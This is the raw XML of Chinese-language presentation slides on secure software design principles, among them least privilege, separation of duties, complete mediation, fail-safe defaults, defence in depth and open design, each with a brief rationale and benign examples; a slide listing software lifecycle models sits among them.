            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估完成操作索需要的最小权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只授予用户或进程执行操作所必需的最小权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只在需要的时候提升权限，当条件满足时允许提升权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="4145915"/>
            <a:ext cx="9401175" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以nobody身份运行的Apache </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中为每个部署的系统创建所属的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>角色</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分离</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413510"/>
            <a:ext cx="10876915" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防止利益冲突，防止不法行为、欺诈、滥用职权以及错误等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防止误操作、操作失败等问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件不同组件，用户不同角色</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分配不同的任务给不同职位的人，或者在多个人间针对某个特定的安全操作过程分配相关的特权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="4296410"/>
            <a:ext cx="10166350" cy="2112010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中用户角色管理：在一个企业管理系统中，用户被分为多个角色，如管理员、财务人员和普通员工。管理员可以创建、编辑和删除用户，而普通员工只能查看自己的信息。这样的角色划分确保了不同角色只能执行特定操作，避免了权限滥用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、软件项目中不同环境的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理：在软件开发过程中开发和生产环境的分离，开发人员与运维人员应有不同的权限。开发人员可以对代码进行更改，但不能直接访问生产环境的数据库。运维人员则负责生产环境的管理，但不能随意修改代码。这种分离确保了代码更改和生产环境的稳定性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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最小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>共享</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821180"/>
            <a:ext cx="10876915" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>避免敏感信息泄漏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提供多用户访问灵活性，并避免竞争冲突</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为每个请求建立独立资源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Oracle数据库为每个库创建一个实例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Apache每个请求创建一个进程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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完全中立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821180"/>
            <a:ext cx="10876915" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>避免权限滥用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每次主体对资源的请求，系统都应该实行认证和执行检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>修改密码前还需要验证一次原密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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软件生命周期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型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245235"/>
            <a:ext cx="10605135" cy="549275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软件的定义</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件是与计算机系统操作有关的计算机程序、规程、规则，以及可能有的文件、文档及数据也就是一系列按照特定顺序组织的计算机数据和指令的集合也就是非有形部分，一般来讲软件被划分为系统软件、应用软件和介于这两者之间的中间件。软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统并不只是包括可以在计算机（这里的计算机是指广义的计算机）上运行的电脑程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统，与这些电脑程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统相关的文档一般也被认为是软件的一部分。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件生命周期模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>瀑布模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>迭代模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>增量模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>快速原型模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>螺旋模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>净室模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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心理可接受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>度</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821180"/>
            <a:ext cx="10876915" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户不会对安全机制抵制从而禁用相关机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>美观的用户界面及使用操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>明确的安全功能说明</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一键杀毒、一键XX......</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>故障</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821180"/>
            <a:ext cx="10876915" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件故障也不会带来其他安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>考虑系统失效和故障时的机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、在金融应用中，如果交易处理出现问题，系统默认将交易回滚，而不是进行部分处理。这避免了资金损失或错误转账。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、服务器访问出现问题，也不会提示服务器的型号、版本等信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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纵深防御</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821180"/>
            <a:ext cx="10876915" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不把安全依赖于某一项机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对一个安全问题提供多项防御机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>帐户锁定策略&amp;密码策略&amp;登录随机验证码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>制定和测试灾难恢复计划，确保在发生重大安全事件或自然灾害时，能够快速恢复关键系统和数据。业务连续性计划确保在系统受到攻击时，仍能保持基本业务功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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公开设计</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821180"/>
            <a:ext cx="10876915" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将安全依赖于攻击者无法了解机制，而应该使攻击者即时知道机制也无法带来安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用成熟可靠的技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设计上不依赖于攻击者无法掌握某些特定信息来保护自己的安全是不可靠</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
